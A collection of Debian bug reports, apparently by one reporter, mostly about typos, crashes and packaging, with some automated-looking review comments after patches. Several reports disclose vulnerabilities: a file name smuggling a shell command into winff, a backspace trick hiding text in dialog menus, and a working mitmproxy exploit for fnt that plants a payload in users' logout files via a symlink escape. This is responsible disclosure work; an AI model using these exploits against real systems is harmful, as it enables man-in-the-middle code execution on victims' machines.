> As far as I know, there isn't a "compressed buildlog" available. We could change our wget call to specify "Accept-Encoding: deflate, gzip"

Yup, that should be a matter of passing --compress=auto to wget.

> but that relies on the server being configured to offer compression.

buildd.debian.org supports it. :)

That said, it seems it compresses the logs on the fly, which slows down things significantly. For example:

   $ url='https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1'

   $ wget "$url" -O /dev/null
   --2024-01-17 13:53:58-- https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1
   Resolving buildd.debian.org (buildd.debian.org)... 2607:f8f0:614:1::1274:60, 209.87.16.60
   Connecting to buildd.debian.org (buildd.debian.org)|2607:f8f0:614:1::1274:60|:443... connected.
   HTTP request sent, awaiting response... 200 OK
   Length: unspecified [text/plain]
   Saving to: ‘/dev/null’

   /dev/null [ <=> ] 48.09M 15.6MB/s in 3.4s

   2024-01-17 13:54:02 (14.2 MB/s) - ‘/dev/null’ saved [50423419]

   $ wget --compress=auto "$url" -O /dev/null
   --2024-01-17 13:54:08-- https://buildd.debian.org/status/fetch.php?pkg=gcc-12=i386=12.3.0-13=1702656593=1
   Resolving buildd.debian.org (buildd.debian.org)... 2607:f8f0:614:1::1274:60, 209.87.16.60
   Connecting to buildd.debian.org (buildd.debian.org)|2607:f8f0:614:1::1274:60|:443... connected.
   HTTP request sent, awaiting response... 200 OK
   Length: unspecified [text/plain]
   Saving to: ‘/dev/null’

   /dev/null [ <=> ] 2.70M 1.05MB/s in 2.6s

   2024-01-17 13:54:12 (1.05 MB/s) - ‘/dev/null’ saved [50423419]

The compressed log was ~18 times smaller, but the download took only 25% less time. It's not clear --compress=auto is always going to be a net benefit.

-- Jakub Wilk
Bug#1031267: debmany: shell injection
* Axel Beckert, 2023-02-14 15:53:
> the exploit code is always shown to the user before the exploit actually runs

Sneakier exploits might be possible, though. For example, for dialog(1), the backspace character can be used to hide stuff, e.g:

   H=$(printf '\b')
   dialog --title '' --menu '' 10 60 20 "foo$H$H$H""bar" bar

(shows "bar" but not "foo")

-- Jakub Wilk
Bug#1060685: jbig2dec: typo in debian/copyright
Source: jbig2dec
Version: 0.19-3
Severity: minor

Please do s/pubic/public/ in debian/copyright.

-- Jakub Wilk
Bug#1057261: RFP: consent-o-matic -- browser extension to automatically fill out cookie popups
Package: wnpp
Severity: wishlist

* Package name    : consent-o-matic
  Version         : 1.0.12
  Upstream Contact: Centre for Advanced Visualisation and Interaction
* URL             : https://github.com/cavi-au/Consent-O-Matic
* License         : Expat
  Programming Lang: JavaScript
  Description     : browser extension to automatically fill out cookie popups

-- Jakub Wilk
Bug#1053373: winff: shell injection
Package: winff
Version: 1.5.5-9
Tags: security

WinFF doesn't correctly escape filenames that it passes to shell. If the user is tricked to convert files with malicious names, this could result in execution of arbitrary code.

To reproduce, try converting the file created by this command:

   touch '$(cowsay pwned >&2; sleep inf).mp3'

-- Jakub Wilk
Bug#998326: hub: git protocol not supported anymore
git:// is also mentioned in the package description. Please fix that too. -- Jakub Wilk
Bug#1042525: localehelper: FTBFS with Perl 5.38: t/help.t failure
Control: tags 1 + fixed-upstream

* Niko Tyni, 2023-07-29 21:19:
> # Failed test 'help message'
> # at t/help.t line 39.
> # got: 'given is deprecated at /<>/t/../localehelper line 153.
> # when is deprecated at /<>/t/../localehelper line 154.
> # when is deprecated at /<>/t/../localehelper line 159.
> # when is deprecated at /<>/t/../localehelper line 167.
> # when is deprecated at /<>/t/../localehelper line 171.

Thanks for the bug report. I've fixed it upstream in 0.1.7.

Commits to cherry-pick if need be:
https://github.com/jwilk/localehelper/commit/af9dabda61314d79
https://github.com/jwilk/localehelper/commit/ef6ca54a5b570bda

-- Jakub Wilk
Bug#1043469: fnt: insecure deb unpacking
Package: fnt
Version: 1.4.1-2
Severity: serious
Tags: security

https://www.gnu.org/software/tar/manual/html_node/Integrity.html says:

"When extracting from two or more untrusted archives, each one should be extracted independently, into different empty directories. Otherwise, the first archive could create a symbolic link into an area outside the working directory, and the second one could follow the link and overwrite data that is not under the working directory."

But fnt extracts every data.tar file into the same directory and does not correctly remove files (potentially: malicious symlinks) after extraction.

Since fnt downloads debs over HTTP and does not verify their integrity in any way, man-in-the-middle attackers could exploit this vulnerability to overwrite arbitrary files.

I've attached a proof-of-concept exploit in the form of a mitmproxy script.

-- Jakub Wilk

# encoding=UTF-8

# Copyright © 2023 Jakub Wilk
# SPDX-License-Identifier: MIT

# Usage:
#   mitmdump --listen-host 127.0.0.1 -s /path/to/fnt_mitm.py
# and then:
#   export http_proxy=http://127.0.0.1:8080/
#   fnt update
#   fnt install symbola
#   fnt install unifont
#   logout

import contextlib
import io
import os
import subprocess
import tarfile
import tempfile

try:
    from mitmproxy.http import Response as HTTPResponse  # mitmproxy >= 7.0
except ImportError:
    from mitmproxy.http import HTTPResponse  # mitmproxy >= 1.0

payload = b'''\
cowsay pwned
sleep inf
'''

debs = []

def mkar(members):
    with tempfile.TemporaryDirectory() as tmpdir:
        ar_path = f'{tmpdir}/out.ar'
        subprocess.run(['ar', 'rcS', ar_path, *members], check=True)
        with open(ar_path, 'rb') as file:
            return file.read()

@contextlib.contextmanager
def tmpcwd():
    old_cwd = os.getcwd()
    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            os.chdir(tmpdir)
            yield
    finally:
        os.chdir(old_cwd)

with tmpcwd():
    members = ['debian-binary', 'control.tar.xz', 'data.tar.xz']
    for member in members:
        with open(member, 'wb'):
            pass
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        tinfo = tarfile.TarInfo('par')
        tinfo.type = tarfile.SYMTYPE
        tinfo.linkname = '..'
        tfile.addfile(tinfo)
    debs += [mkar(members)]
    with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
        for target in '.bash_logout', '.zlogout':
            tinfo = tarfile.TarInfo(f'par/{target}')
            tinfo.size = len(payload)
            tfile.addfile(tinfo, io.BytesIO(payload))
    debs += [mkar(members)]

class state:
    n = 0

def request(flow):
    if flow.request.path.endswith('.deb'):
        flow.response = HTTPResponse.make(
            200,
            debs[state.n],
            {'Content-Type': 'application/vnd.debian.binary-package'}
        )
        state.n ^= 1

# vim:ts=4 sts=4 sw=4 et
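The separation the tar manual asks for, shown as an added example (it is not part of the bug report and not fnt's code): two constructed archives shaped like the ones in the report are extracted once into a shared directory and once into separate empty directories, and leftover symlinks that point outside their extraction directory are flagged. All function names and the harmless marker.txt file are assumptions of this example.

```python
import io
import os
import tarfile
import tempfile

# Plain tar semantics with no member filtering, so the effect of the directory
# layout alone is visible. Newer Python versions need this spelled out.
_TRUSTED = ({"filter": "fully_trusted"}
            if hasattr(tarfile, "fully_trusted_filter") else {})


def make_tar(build):
    """Return an in-memory tar archive populated by build(tarfile)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        build(tf)
    return buf.getvalue()


def constructed_archives():
    """Constructed sample input: a link to '..', then a file beneath that name."""
    def first(tf):
        link = tarfile.TarInfo("par")
        link.type = tarfile.SYMTYPE
        link.linkname = ".."
        tf.addfile(link)

    def second(tf):
        data = b"harmless marker\n"
        info = tarfile.TarInfo("par/marker.txt")
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))

    return [make_tar(first), make_tar(second)]


def extract(blob, dest):
    with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
        tf.extractall(dest, **_TRUSTED)


def extract_shared(archives, workdir):
    """The pattern from the report: every archive goes into the same directory."""
    for blob in archives:
        extract(blob, workdir)


def extract_isolated(archives, base):
    """Each archive gets its own fresh, empty directory under base."""
    dirs = []
    for blob in archives:
        dest = tempfile.mkdtemp(prefix="pkg-", dir=base)
        extract(blob, dest)
        dirs.append(dest)
    return dirs


def escaping_symlinks(root):
    """Relative paths of symlinks under root that resolve outside root."""
    root_real = os.path.realpath(root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                target = os.path.realpath(path)
                if os.path.commonpath([root_real, target]) != root_real:
                    found.append(os.path.relpath(path, root))
    return found


def demo():
    with tempfile.TemporaryDirectory() as sandbox:
        archives = constructed_archives()

        shared = os.path.join(sandbox, "shared", "work")
        os.makedirs(shared)
        extract_shared(archives, shared)
        # The second archive wrote through the first archive's link.
        leaked_shared = os.path.exists(
            os.path.join(sandbox, "shared", "marker.txt"))

        base = os.path.join(sandbox, "isolated")
        os.makedirs(base)
        dirs = extract_isolated(archives, base)
        leaked_isolated = os.path.exists(os.path.join(base, "marker.txt"))
        contained = os.path.isfile(os.path.join(dirs[1], "par", "marker.txt"))
        flagged = [escaping_symlinks(d) for d in dirs]
        return leaked_shared, leaked_isolated, contained, flagged


if __name__ == "__main__":
    print(demo())
```

Isolation stops the cross-archive write, but the link from the first archive still exists in its own directory, so anything that later copies files out of it should consult `escaping_symlinks` first.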
Bug#1042744: pyquery: bad Homepage field
Source: pyquery Apparently pyquery.org has been taken over by spammers. Please update the Homepage field to https://github.com/gawel/pyquery . -- Jakub Wilk
Bug#1042487: neomutt: ANSI headers not decoded
When the From: field contains an umlaut (“ö”), such as:

    Andreas Rönnquist

it then gets encoded for transport and the literal text is:

    From: Andreas =?UTF-8?B?UsO2bm5xdWlzdA==?=

Neomutt properly treats that UTF-8 encoding. However, the 33mail.com forwarding service apparently re-encodes it in ANSI as follows:

    From: "=?ANSI_X3.4-1968?Q?Andreas_R=3Fnnquist?= 'redacted' via 33Mail"

This is a bug in the software that generated this header, not in Neomutt:

• ANSI_X3.4-1968 is an alias for US-ASCII, a 7-bit charset that doesn't include the character "ö".
• An encoded-word is not allowed inside quoted-string; see RFC 2047 §5.

-- Jakub Wilk
Bug#1042397: countmail: 1: from: not found
Package: bsdgames Version: 2.17-29+b1 countmail(6) has an undeclared dependency on mailutils: $ countmail /usr/games/countmail: 1: from: not found ZERO! ZERO MAIL MESSAGES! HAHAHAHAHA! Please add the needed package to Suggests and improve error handling. -- Jakub Wilk
Bug#635765: /bin/dd: dd if=/dev/zero of=testfile_4G bs=4G count=1 produces a 2G file
* Mathieu Malaterre , 2011-07-28 17:49: For some reason the following command: dd if=/dev/zero of=testfile_4G bs=4G count=1 produces a 2G file: $ dd if=/dev/zero of=testfile_4G bs=4G count=1 0+1 records in 0+1 records out 2147479552 bytes (2.1 GB) copied, 64.1528 s, 33.5 MB/s This happens because: * "read() (and similar system calls) will transfer at most 0x7000 (2,147,479,552) bytes". * dd does not continue after a short read, unless you use iflag=fullblock. -- Jakub Wilk
Bug#1023626: grip --clear: "No README found at"
Control: tags -1 + fixed-upstream

* Jakub Wilk , 2022-11-07 20:54:
grip.exceptions.ReadmeNotFoundError: No README found at .

I believe this was fixed upstream in 4.3.0:
https://github.com/joeyespo/grip/commit/0253989266911fba

-- Jakub Wilk
Bug#1037517: console-setup-linux: wrong char for * A
Package: console-setup-linux Version: 1.221 In X, * A produces "Å" (U+00C5 LATIN CAPITAL LETTER A WITH RING ABOVE). But on the console, I get "Ĺ" (U+0139 LATIN CAPITAL LETTER L WITH ACUTE) instead. -- System Information: Versions of packages console-setup-linux depends on: ii init-system-helpers 1.65.2 ii initscripts 3.06-4 ii kbd 2.5.1-1+b1 ii keyboard-configuration 1.221 console-setup-linux recommends no packages. Versions of packages console-setup-linux suggests: ii console-setup 1.221 Versions of packages keyboard-configuration depends on: ii debconf [debconf-2.0] 1.5.82 ii liblocale-gettext-perl 1.07-5 ii xkb-data2.35.1-1 Versions of packages console-setup depends on: ii debconf [debconf-2.0] 1.5.82 ii keyboard-configuration 1.221 ii xkb-data2.35.1-1 Versions of packages console-setup suggests: ii locales2.36-9 ii sysvinit-utils [lsb-base] 3.06-4 Versions of packages console-setup-linux is related to: pn console-common pn console-data pn console-tools pn gnome-control-center ii kbd 2.5.1-1+b1 ii systemd 252.6-1 /etc/console-setup/remap.inc changed [not included] -- debconf information: keyboard-configuration/layoutcode: pl keyboard-configuration/modelcode: pc105 keyboard-configuration/store_defaults_in_debconf_db: true keyboard-configuration/other: keyboard-configuration/switch: No temporary switch keyboard-configuration/unsupported_layout: true * keyboard-configuration/altgr: The default for the keyboard layout * keyboard-configuration/ctrl_alt_bksp: true keyboard-configuration/unsupported_options: true console-setup/guess_font: * keyboard-configuration/unsupported_config_options: true * console-setup/codeset47: . 
Combined - Latin; Slavic Cyrillic; Greek console-setup/store_defaults_in_debconf_db: true * console-setup/fontsize-fb47: 8x16 * console-setup/fontface47: TerminusBold * keyboard-configuration/variant: Polish keyboard-configuration/toggle: No toggling * keyboard-configuration/layout: Poland console-setup/fontsize-text47: 8x16 console-setup/framebuffer_only: debian-installer/console-setup-udeb/title: keyboard-configuration/variantcode: * console-setup/charmap47: UTF-8 console-setup/codesetcode: Uni2 keyboard-configuration/xkb-keymap: pl console-setup/use_system_font: * keyboard-configuration/compose: Menu key keyboard-configuration/optionscode: compose:menu,terminate:ctrl_alt_bksp,caps:escape * keyboard-configuration/model: Generic 105-key PC keyboard-configuration/unsupported_config_layout: true console-setup/fontsize: 8x16 -- Jakub Wilk
Bug#1037501: surfraw: broken example (/usr/lib/surfraw/rhyme)
Package: surfraw Version: 2.3.0-2 Severity: minor The surfraw(1) manual page contains the following example: $ /usr/lib/surfraw/rhyme -method=perfect Julian But /usr/lib/surfraw/rhyme does not exist. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
* Simon McVittie , 2023-06-02 19:33: I recently uploaded sdl12-compat version 1.2.64 to experimental, and from some quick testing it seems to run OK with that version. Yup, upgrading libsdl1.2-compat-shim to 1.2.62-1 fixes it for me. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
* Jakub Wilk , 2023-06-02 18:49: ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 Looks like it crashes only if libsdl1.2-compat-shim is installed. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
Package: pink-pony Version: 1.4.1-3.1 Severity: grave pink-pony crashes on start: $ pink-pony malloc(): corrupted top size Aborted Or sometimes: $ pink-pony Segmentation fault Or: $ pink-pony Fatal glibc error: malloc assertion failure in _int_malloc: (unsigned long) (size) >= (unsigned long) (nb) Aborted -- System Information: Architecture: i386 Versions of packages pink-pony depends on: ii libc62.36-9 ii libdevil1c2 1.7.8-10+b3 ii libftgl2 2.4.0-2.1 ii libgcc-s112.2.0-14 ii libgl1 1.6.0-1 ii libglfw3 3.3.8-1 ii libglu1-mesa [libglu1] 9.0.2-1.1 ii libimath-3-1-29 3.1.6-1 ii libprotobuf323.21.12-3 ii libsdl-mixer1.2 1.2.12-17+b3 ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 ii libsigc++-2.0-0v52.12.0-1 ii libstdc++6 12.2.0-14 ii libtinyxml2.6.2v52.6.2-6 ii pink-pony-data 1.4.1-3.1 -- Jakub Wilk
Bug#1036537: yaml2toml: AttributeError: module 'tomllib' has no attribute 'dumps'
Package: reserialize Version: 20220929-1 yaml2toml doesn't work: $ yaml2toml /dev/null Traceback (most recent call last): File "/usr/bin/yaml2toml", line 93, in data = str_dumpers[otype](data) File "/usr/bin/yaml2toml", line 53, in "toml": lambda arg: toml.dumps(arg), ^^ AttributeError: module 'tomllib' has no attribute 'dumps' -- System Information: Architecture: i386 Versions of packages reserialize depends on: ii python3-yaml 6.0-3+b2 ii python3 3.11.2-1+b1 Versions of packages reserialize recommends: un python3-bson ii python3-toml 0.10.2-1 -- Jakub Wilk
Bug#1036536: toml2yaml: TypeError: File must be opened in binary mode
Package: reserialize Version: 20220929-1 toml2yaml doesn't work: $ toml2yaml /dev/null Traceback (most recent call last): File "/usr/bin/toml2yaml", line 87, in data = fh_loaders[itype](ifh) ^^ File "/usr/bin/toml2yaml", line 29, in "toml": lambda fh: toml.load(fh), ^ File "/usr/lib/python3.11/tomllib/_parser.py", line 63, in load raise TypeError( TypeError: File must be opened in binary mode, e.g. use `open('foo.toml', 'rb')` -- System Information: Architecture: i386 Versions of packages reserialize depends on: ii python3-yaml 6.0-3+b2 ii python3 3.11.2-1+b1 Versions of packages reserialize recommends: un python3-bson ii python3-toml 0.10.2-1 -- Jakub Wilk
Bug#1035418: aiksaurus: no Homepage field
Source: aiksaurus Version: 1.2.1+dev-0.12-7 Severity: minor Please add Homepage: https://aiksaurus.sourceforge.net/ to debian/control. -- Jakub Wilk
Bug#1034540: rhvoice: out of date language list
Package: rhvoice Version: 1.8.0+dfsg-3 Severity: minor The package description reads: Initially, RHVoice could speak only Russian. Now it also supports English, Esperanto and Georgian. There are many other supported languages these days. -- Jakub Wilk
Bug#1034520: python3-cairo: unhelpful upstream changelog
Package: python3-cairo Version: 1.20.1-5+b1 This is unhelpful: $ zcat /usr/share/doc/python3-cairo/changelog.gz Changelog = .. currentmodule:: cairo .. include:: ../NEWS -- Jakub Wilk
Bug#1034514: python3-fastimport: "git" missing from description
Package: python3-fastimport Version: 0.9.14-2.1 Please mention "git" somewhere in the package description. -- Jakub Wilk
Bug#1033973: devscripts: syntax error in salsa bash completion
Package: devscripts Version: 2.23.3 Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Wed, 5 Apr 2023 12:08:23 +0200 Subject: [PATCH] Fix syntax error in salsa bash completion Reported-by: Unit 193 --- scripts/salsa.bash_completion | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/salsa.bash_completion b/scripts/salsa.bash_completion index a2d0a7bc..2dbebcbb 100644 --- a/scripts/salsa.bash_completion +++ b/scripts/salsa.bash_completion @@ -15,7 +15,7 @@ _salsa_completion () { opts+=" --disable-kgb --disable-tagpending --group --group-id" opts+=" --enable-remove-source-branch --disable-remove-source-branch" opts+=" --issues --mr --repo --forks --lfs --packages --jobs --pages" -opts+=" --container --analytics --requirements --wiki --snippets +opts+=" --container --analytics --requirements --wiki --snippets" opts+=" --releases --auto-devops --request-acc --ci-config-path" opts+=" --mr-allow-squash --no-mr-allow-squash --mr-desc --mr-title" opts+=" --mr-dst-branch --mr-dst-project --mr-remove-source-branch" -- 2.40.0
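Review bot: The closing quote restored on the `--container ... --snippets` line is the whole fix, and nothing in this change would catch the same slip the next time an option is added. Since a single unterminated string in one `opts+=` line breaks the entire `_salsa_completion` function, consider running `bash -n scripts/salsa.bash_completion` as part of whatever checks cover the scripts directory.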
Bug#1033328: basez: typo: witn -> with
Package: basez Version: 1.6.2-1 Severity: minor Tags: patch -- Jakub Wilk --- a/basez.1 +++ b/basez.1 @@ -57,7 +57,7 @@ with equal sign end padding. Appearance end of the encoded steam can be avoided by encoding data of size divisible by 5. Base32 decoding is case insensitive. .PP -Base32hex encoding works the same way as base32 but witn an alternative +Base32hex encoding works the same way as base32 but with an alternative character\-set [0\-9a\-v] to preserve the encoded data sort order. This encoding should not be confused with base32. .PP --- a/basez.c +++ b/basez.c @@ -509,7 +509,7 @@ APPNAME "by 5. Base32 decoding is case insensitive.\n" ); puts( -"Base32hex encoding works the same way as base32 but witn an alternative \n" +"Base32hex encoding works the same way as base32 but with an alternative \n" "character-set [0-9a-v] to preserve the encoded data sort order. \n" "This encoding should not be confused with base32.\n" );
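Review bot: In the basez.1 hunk, the unchanged context line just above the fix still reads "end of the encoded steam", which looks like a typo for "stream" and could be corrected in the same patch. In the basez.c hunk, the corrected string keeps the trailing space before `\n` ("alternative \n"), which could be dropped while the line is being touched.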
Bug#1033248: ITP: python-onetimepad -- python library for the onetimepad algorithm
* Matthias Geiger , 2023-03-20 18:36: https://github.com/jailuthra/onetimepad Misleading package name. Should be: python-toy-xor-encryption-do-not-use. No, really, don't upload this to Debian. it's a dependency for banking (#1013317). It seems banking uses this via an embedded copy of <https://github.com/harshnative/pysqlitecipher>, which is also horrifying. -- Jakub Wilk
Bug#995822: fbset: modeline2fb: fbset is (1), not (8)
There's another fbset(8) reference in the fb.modes man page: $ man fb.modes | grep -Ewo 'fbset[()0-9]+' fbset(8) -- Jakub Wilk
Bug#1032477: filters man page: lowercase "lolcat"
Package: filters Version: 2.55-3 Severity: minor $ man filters.6 | grep -w lolcat lolcat As seen in internet gifs everywhere. But "lolcat" was renamed to "LOLCAT" in 2.52 (bug #760910). -- Jakub Wilk
Bug#1032472: fonts-oxygen: out of date package description?
Package: fonts-oxygen Version: 4:5.4.3-4 The package description reads: "a bold weight, plus regular and bold italics, and a monospace version will be made". But bold and monospace versions are already shipped by this package. -- Jakub Wilk
Bug#1032337: devscripts: missing dep list in package description
Package: devscripts Version: 2.23.2 The dependency list is missing from the package description: $ dpkg -I devscripts_2.23.2_i386.deb | tail -n3 Description: scripts to make the life of a Debian Package maintainer easier Contains the following scripts, dependencies/recommendations shown in brackets afterwards: -- Jakub Wilk
Bug#1032302: sbuild: Lintian exit status confusion
Package: sbuild
Version: 0.85.0

The following code in Sbuild/Build.pm is for interpreting Lintian exit status:

    my $status = $? >> 8;
    my $why = "unknown reason";
    $self->set('Lintian Reason', 'fail') if ($status == 1);
    $why = "runtime error" if ($status == 2);
    $why = "policy violation" if ($status == 1);

This used to match what Lintian did (and what was documented it did); but the exit status semantics has been changed in Lintian 2.77.0:

    * Reverse the exit statuses for program errors and policy violations. (Re: #709932)

So now when Lintian reports a policy violation, sbuild says it's a runtime error, and the other way round.

-- Jakub Wilk
Bug#1032278: ttf-bitstream-vera: out-of-date reference to ttf-dejavu in package description
Package: ttf-bitstream-vera Version: 1.10-8.2 The package description reads: use ttf-dejavu instead But ttf-dejavu had been a transitional package since 2013, and it was finally removed in 2020 (see bug #872809). Please do s/ttf-dejavu/fonts-dejavu/. -- Jakub Wilk
Bug#1032177: faketime doesn't fake time (on i386)
Package: faketime Version: 0.9.10-2.1 Severity: grave faketime no longer works on i386: $ faketime -f '2008-12-24 08:15:42' date -R Wed, 01 Mar 2023 08:25:58 +0100 -- System Information: Architecture: i386 Versions of packages faketime depends on: ii libfaketime 0.9.10-2.1 ii libc62.36-8 -- Jakub Wilk
Bug#1032149: criterion: U+FFFC OBJECT REPLACEMENT CHARACTER in package descriptions
Source: criterion Version: 2.4.1-1 Severity: minor The lists in the package descriptions are indented with object replacement characters (U+FFFC). This is weird. Please replace them with spaces: sed -i -e 's/\xEF\xBF\xBC/ /' debian/control -- Jakub Wilk
Bug#1021425: debmany: "The package does not exist" when in exists in cwd
* Axel Beckert , 2022-10-08 14:49: So maybe we need an "apt-get print-uris" (or "apt-cache print-uris") subcommand analogous to the "apt reinstall" shortcut for "apt --reinstall install") which reliably shows that URI independent of any current package state or downloaded files. Such an option for APT would be indeed useful, but in the mean time, debmany could just chdir into a directory that doesn't contain any *.deb files before running "apt-get --print-uris ...". See the attached patch. -- Jakub Wilk diff --git a/debmany/debmany b/debmany/debmany index dfea6e9..7a6029a 100755 --- a/debmany/debmany +++ b/debmany/debmany @@ -279,11 +279,11 @@ else if [ -z "$file" ] then debug "Mode3: Determining the path of '$package' using 'apt-get -q2 --print-uris download'" # comment -aptdata=`apt-get -q2 --print-uris download "$package" 2>/dev/null | grep "$package"_` +aptdata=`cd / && apt-get -q2 --print-uris download "$package" 2>/dev/null | grep "$package"_` if [ -z "$aptdata" ] then errormsg "There was an error looking for package '$package'." - aptdata=`apt-get -q2 --print-uris download "apt" 2>/dev/null | grep "apt"_` + aptdata=`cd / && apt-get -q2 --print-uris download "apt" 2>/dev/null | grep "apt"_` if [ $? -ne 0 ] || [ -z "$aptdata" ] ; then # If looking for apt fails then there is something amiss error "Apt-get might not be working properly Possible failure when running 'apt-get -q2 --print-uris download \"$package\"'"
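Review bot: Both changed `aptdata=` lines depend on `/` never containing a matching .deb file, which is likely but not guaranteed; running the lookup from a freshly created empty directory (for example one from `mktemp -d`, removed afterwards) would make it independent of what is on the filesystem. The debug message above the first changed line and the error text below the second still describe the command without the `cd`, so a short comment saying why the directory change is there would help the next reader.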
Bug#1031938: debmany: dialog option injection
Control: tags -1 + security * Jakub Wilk , 2023-02-25 17:51: PoC exploit that tries to append malicious code to /home/alice/.bash_logout. The code that generated the crafted .deb is here: https://github.com/jwilk/crafted.deb/blob/master/gen-deb1031938-debmany -- Jakub Wilk
Bug#1031549: debchange man page: uneven indentation in option list
Package: devscripts Version: 2.23.1 Severity: minor Tags: patch -- Jakub Wilk diff --git a/scripts/debchange.1 b/scripts/debchange.1 index 752a4503..d1f02de3 100644 --- a/scripts/debchange.1 +++ b/scripts/debchange.1 @@ -314,7 +314,7 @@ Preserve the source tree directory name if the upstream version number (or the version number of a Debian native package) changes. See also the configuration variables section below. .TP -\fB \-\-no\-preserve\fR, \fB\-\-nopreserve\fR +\fB\-\-no\-preserve\fR, \fB\-\-nopreserve\fR Do not preserve the source tree directory name (default). .TP \fB\-\-vendor \fIvendor\fR
Bug#1031516: fbterm: typos in package description
Package: fbterm Version: 1.7-5 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Fri, 17 Feb 2023 16:52:27 +0100 Subject: [PATCH] Fix typos in package description --- debian/control | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/debian/control b/debian/control index 95a387d..112d435 100644 --- a/debian/control +++ b/debian/control @@ -20,11 +20,11 @@ Description: fast framebuffer based terminal emulator for Linux enabled on framebuffer device * select font with fontconfig and draw text with freetype2, same as Qt/Gtk+ based GUI apps - * dynamicly create/destroy up to 10 windows initially running default shell + * dynamically create/destroy up to 10 windows initially running default shell * record scrollback history for every window * auto-detect current locale and convert text encoding, support double width scripts like Chinese, Japanese etc * switch between configurable additional text encoding with hot keys on the fly - * copy/past selected text between windows with mouse when gpm server is + * copy/paste selected text between windows with mouse when gpm server is running -- 2.39.2
Bug#1031515: fbterm: missing tags 1.7-3, 1.7-5
Source: fbterm Tags for 1.7-3 and 1.7-5 are missing from the git repo: $ git ls-remote https://salsa.debian.org/debian/fbterm.git 'refs/tags/debian/1.7-*[0-9]' bd1616f26a09a4f2ca58b7712643367eb6053bf3 refs/tags/debian/1.7-1 f41d4eff26affc40f8e3c06ed54142625549eb96 refs/tags/debian/1.7-2 0ce83f9b23187655e8809880895033390f942452 refs/tags/debian/1.7-4 -- Jakub Wilk
Bug#1031294: doc-debian: misspelled "Control: forwarded"
Package: doc-debian Version: 6.5 bug-reporting.txt gives the following example: Control: forward -1 https://bugs.debian.org/nnn This should be "forwarded", not "forward". It's been already fixed on the website: #863069 -- Jakub Wilk
Bug#1031267: debmany: shell injection
* Jakub Wilk , 2023-02-14 10:53: attached proof-of-concept exploit. The code that generated the crafted .deb is here: https://github.com/jwilk/crafted.deb/blob/master/gen-deb1031267-debmany -- Jakub Wilk
Bug#1031241: aspic: no upstream URL in copyright file
Package: aspic Version: 2.00+dfsg-1 Severity: serious Justification: Policy 12.5 The copyright file doesn't say where the upstream sources were obtained. -- Jakub Wilk
Bug#1031218: /etc/init.d/apt-cacher-ng: unholy mixture of tabs and spaces
Package: apt-cacher-ng Version: 3.7.4-1 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Mon, 13 Feb 2023 12:09:17 +0100 Subject: [PATCH] Expand tabs in init script --- debian/apt-cacher-ng.init | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/debian/apt-cacher-ng.init b/debian/apt-cacher-ng.init index 27f42b9..126da9c 100644 --- a/debian/apt-cacher-ng.init +++ b/debian/apt-cacher-ng.init @@ -26,7 +26,7 @@ test -x $DAEMON || exit 0 # Include apt-cacher-ng defaults if available if [ -f /etc/default/apt-cacher-ng ] ; then - . /etc/default/apt-cacher-ng + . /etc/default/apt-cacher-ng fi # our runtime state files directory, will be purged on startup! @@ -44,7 +44,7 @@ do_start() { do_stop() { - if ! start-stop-daemon --stop --retry 15 --quiet --pidfile $PIDFILE \ + if ! start-stop-daemon --stop --retry 15 --quiet --pidfile $PIDFILE \ --exec $DAEMON then if ! test -e "$PIDFILE" && ! start-stop-daemon --stop \ @@ -55,7 +55,7 @@ do_stop() { fi rm -f $PIDFILE return 0 - + } case "$1" in -- 2.39.1
Bug#1031083: python3-injector: stray reStructuredText markup in package description
Package: python3-injector Version: 0.19.0-2 Severity: minor Tags: patch -- Jakub Wilk From: Jakub Wilk Date: Sat, 11 Feb 2023 12:39:53 +0100 Subject: [PATCH] Remove stray reST markup from package description --- debian/control | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/debian/control b/debian/control index c5b65f3..963777a 100644 --- a/debian/control +++ b/debian/control @@ -32,6 +32,6 @@ Description: Python dependency injection framework . That's where Injector can help. It automatically and transitively provides dependencies for you. As an added benefit, Injector encourages - nicely compartmentalised code through the use of :ref:modules . + nicely compartmentalised code through the use of modules. . This package installs the library for Python 3. -- 2.39.1
Bug#1030892: maxima: tab causes "fatal error" and "Segmentation violation"
* Camm Maguire , 2023-02-08 17:24: Greetings, and thanks for your report! I cannot reproduce this. As a data point, I get the crash on i386, but not on amd64. Are you running in a terminal or in an emacs shell? Terminal. If you precede the tabs with :lisp (si::readline-off) does the problem go away? Yes, it does. -- Jakub Wilk
Bug#1030892: maxima: tab causes "fatal error" and "Segmentation violation"
Package: maxima Version: 5.46.0-8 Maxima crashes when I press tab twice: $ maxima -q (%i1) Maxima encountered a Lisp error: Condition in MACSYMA-TOP-LEVEL [or a callee]: INTERNAL-SIMPLE-ERROR: Caught fatal error [memory may be damaged] Automatically continuing. To enable the Lisp debugger set *debugger-hook* to nil. (%i1) Unrecoverable error: Segmentation violation.. Aborted -- System Information: Architecture: i386 Versions of packages maxima depends on: ii libc6 2.36-8 ii libedit2 3.1-20221030-2 ii libgmp10 2:6.2.1+dfsg1-1.1 ii libtirpc3 1.3.3+ds-1 ii libx11-6 2:1.8.3-3 -- Jakub Wilk
Bug#1027833: user-mode-linux: hostfs directory traversal
